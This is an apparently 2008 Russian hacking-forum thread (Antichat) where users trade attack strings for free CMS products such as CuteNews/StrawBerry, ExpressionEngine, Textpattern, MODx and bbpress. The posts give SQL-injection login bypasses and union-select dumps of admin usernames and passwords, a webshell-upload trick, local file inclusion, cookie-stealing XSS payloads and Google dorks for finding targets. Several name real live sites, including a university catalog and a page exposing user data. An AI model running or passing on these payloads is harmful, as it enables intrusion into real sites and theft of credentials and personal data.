Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

21.11.2008, 02:59
|
|
Познающий
Регистрация: 29.01.2008
Сообщений: 82
Провел на форуме: 373690
Репутация:
88
|
|
StrawBerry 1.1.1 (бывший CuteNews)
Инклюд для версии с TXT базами:
Код:
http://localhost/example/index.php?do=../../../../db/base/users.MYD%00
Инклюд по такому принципу присутствует во всех ТХТ версиях StrawBerry и CuteNews
Заливка шела:
Админка->Настройки->Управление картинками
переименовываем шелл в .jpg и заливаем на серв.
Жмём "переименовать", меняем разрешение обратно на пхп, получаем шел. Для StrawBerry 1.1.1, т.к. доступ к папке аплоад запрежён переименовываем в "../../shell.php" получаем _ttp://localhost/shell.php
|
|
|

01.12.2008, 03:45
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме: 14324684
Репутация:
3908
|
|
Active Business Directory v 2 (Auth Bypass) SQL Injection Vulnerability
script: Active Business Directory v 2
found: Ded MustD!e
exploit: http://www.activewebsoftwares.com/demoactivebusinessdirectory/account.asp
E-mail Address: ' or ' 1=1
Password: ' or ' 1=1
ASPReferral v 5.3 (Auth Bypass) SQL Injection Vulnerability
script: ASPReferral v 5.3
found: Ded MustD!e
exploit: http://www.activewebsoftwares.com/demoaspreferral/Merchant.asp
E-mail Address: ' or ' 1=1--
Password: ' or ' 1=1--
|
|
|

07.12.2008, 06:16
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме: 10605912
Репутация:
4693
|
|
ExpressionEngine Core v. 1.6.6 и другие версии и модификации вроде бы тоже (пишут, что за бугром популярен)
Алгоритм хеширования: sha1(pass) - по дефолту, или md5(pass).
XSS (Кстати, этим скриптом можно отправить кому угодно письмо с уязвимого сервера, с обратным адресом владельца блога):
Код:
POST: http://test1.ru/system/utilities/email_test.php
recipient=1"><script>alert(/XSS1/)</script>&subject=2"><script>alert(/XSS2/)</script>&message=3"></textarea><script>alert(/XSS3/)</script>
При неудалённом install.php:
LFI:
Код:
http://test1.ru/install.php?page=4
system_dir=system&ext=/../../1.php
//Если system_dir не system (по дефолту), то следует изменить на актуальный.
LFI:
Код:
http://test1.ru/install.php?page=5
ext=/../../1.php
LFI:
Код:
http://test1.ru/install.php?page=6
ext=/../../1.php
LFI:
Код:
http://test1.ru/install.php?page=7
rebuild_config=1&ext=/../../1.php
Раскрытие путей :
Код:
http://test1.ru/system/utilities/admin.php
http://test1.ru/system/utilities/dbtest.php
Раскрытие путей (при register_globals= ON):
Код:
http://test1.ru/system/update.php?conf=1
Раскрытие информации о пользователях, префикса таблиц БД, ip адресов юзеров(да и не только):
Папки не спрятаны .htaccess'ом, в диком интернете в db_cache можно найти интересную информацию:
Код:
/system/cache/sql_cache/
/system/cache/db_cache/
/system/cache/magpie_cache/
/system/cache/page_cache/
/system/cache/tag_cache/
Например: http://concerningdesign.org/system/cache/db_cache/6a992d5529f459a44fee58c733255e86/6c6237982ae04c3a69cea9d2ca9a6a3e (информация о пользователях логин, мыло и т.п.)
dork: "powered by ExpressionEngine" (кстати, действительно, довольно много)
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
Последний раз редактировалось Qwazar; 07.12.2008 в 08:36..
|
|
|

07.12.2008, 17:56
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме: 5149122
Репутация:
2438
|
|
Energine
скину сюда,потому что я ослеп,и не вижу тему "Уязвимости бесплатных ЦМС"
SQL Inj:
Код:
site.com/news.php?id=-1%27%20union%20select%201,username,password,4,5%20 from%20dir_admins/*
XSS:
В поиск:
Код:
"><script>alert()</script>
|
|
|

07.12.2008, 22:44
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме: 2313429
Репутация:
728
|
|
CMS: [ ACMS™ ]
Developer: [ http://www.acalog.com/ ]
Dork: [ Powered by the acalog™ academic catalog management system (ACMS™) inurl:"?coid=" ]
Bug type: [ Blind Sql Injection ]
Bug: [ coid=63+and+ascii(lower(substring((version()),1,1) ))=52/* ]
Example: [ http://catalog.sdstate.edu/preview_course.php?catoid=2&coid=63+and+ascii(lowe r(substring((version()),1,1)))=52/* ]
Примечательно, что большинство сайтов с бажной цмс находятся в доменной зоне .edu
|
|
|

12.12.2008, 00:55
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме: 7617458
Репутация:
3965
|
|
Уязвимости FAQMasterFlex
[Уязвимости FAQMasterFlex] Условие: magic_quotes_gpc = OFF
1.
File:faq.php
Уязвимый кусок кода:
PHP код:
$result = mysql_query("SELECT * FROM faqs WHERE category_id = '$category_id'") or die(mysql_error());
SQL иньекция:
Код:
http://path/FAQMasterFlex/faq.php?answer=2&cat_name=FAQMasterFlex%20Usage&category_id=1'+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4/*
2.
File:faq_admin.php
Уязвимый кусок кода:
PHP код:
$result = mysql_query("SELECT * FROM faqs WHERE category_id = '$category'") or die(mysql_error());
SQL иньекция:
Код:
http://path/FAQMasterFlex/faq_admin.php?category='+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4/*&cat_name=
Google dork:"Powered by Lethal Penguin."
http://www.lethalpenguin.net/design/faqmasterflex.php?download=true
__________________
BlackHat. MoDL
|
|
|

14.12.2008, 19:18
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме: 4192567
Репутация:
2145
|
|
Textpattern v.4.0.3
Passive XSS
Код:
http://localhost/textpattern/index.php?event=tag&name=image&id=1&ext=</textarea><script>alert(document.cookie)</script>&alt=&h=1&w=400&type=textile
Код:
http://localhost/textpattern/index.php?event=log&step=list&page=1<script>alert(document.cookie)</script>
Active XSS
Написать новую статью => http://localhost/textpattern/index.php?event=article => в заголовок вставляем код
Код:
<script>alert()</script> или </title><script>alert()</script>
Категории => уязвимо поле "Название".
Файлы => поле "Описание".
Ссылки => поля "Заголовок" и "Описание".
(c) iddqd
Последний раз редактировалось iddqd; 15.12.2008 в 13:38..
|
|
|

19.12.2008, 19:50
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме: 10605912
Репутация:
4693
|
|
MODx 0.9.6.2
Passive XSS
Код:
/assets/modules/docmanager/includes/tv.ajax.php
POST: tplID=-1&langNoTV=<body onLoad=alert('ok')>
Код:
/assets/plugins/tinymce3101/tinymce.linklist.php?list=<script>alert(/XSS/)</script>
register_globals ON
Код:
/assets/snippets/ditto/extenders/request.extender.inc.php?dbg=1&stripTags=0&ditto_<script>alert(/XSS/)</script>
register_globals ON
В этом случае забавно то, что XSS в имени параметра, а вот значение фильтруется жёстко.
Раскрытия путей
Код:
assets/cache/siteCache.idx.php
manager/includes/rss.inc.php
manager/includes/browsercheck.inc.php
manager/includes/sniff/phpSniff.class.php
manager/includes/extenders/getUserData.extender.php
assets/snippets/ditto/formats/xml.format.inc.php
assets/snippets/ditto/formats/rss.format.inc.php
assets/snippets/ditto/formats/json.format.inc.php
assets/snippets/ditto/classes/debug.class.inc.php
assets/snippets/ditto/formats/atom.format.inc.php
assets/snippets/ditto/extenders/tagging.extender.inc.php
manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php
assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/PSpell.php
assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/GoogleSpell.php
assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/EnchantSpell.php
assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/PSpellShell.php
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|

20.12.2008, 16:26
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме: 5149122
Репутация:
2438
|
|
bbpress
bbpress v1.0
File: realplay.php
Уязвимый кусок кода:
Код:
<?php
echo (get_magic_quotes_gpc() ? stripslashes($_GET['link']) : $_GET['link']);
?>
XSS иньекция:
Код:
http:/path/inc/realplay.php?link=%3Cscript%3Ealert(document.cooki e)%3C/script%3E
Активная XSS:
В /inc/realplay.php поле email вводим:
Код:
<script>alert()</script>
Последний раз редактировалось baltazar; 20.12.2008 в 16:28..
|
|
|

20.12.2008, 22:30
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме: 5149122
Репутация:
2438
|
|
WorkingOnWeb
File: admin.inc.php
Уязвимый кусок кода:
Код:
$user = "";
$pass = "";
if (isset($_POST['loginname']) && $_POST['loginname'] != "")
$user = $_POST['loginname'];
if (isset($_POST['loginpass']) && $_POST['loginpass'] != "")
$pass = $_POST['loginpass'];
$loggedin = $this->loginuser($user, $pass);
SQL Иньекция:
Код:
http://path/articles/rss.php?category=-1/**/union/**/select/**/1,2,login,password/**/from/**/users/*
XSS иньекция:
Код:
http://path/wow/index.php/"><script>alert(document.cookie)</script>
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|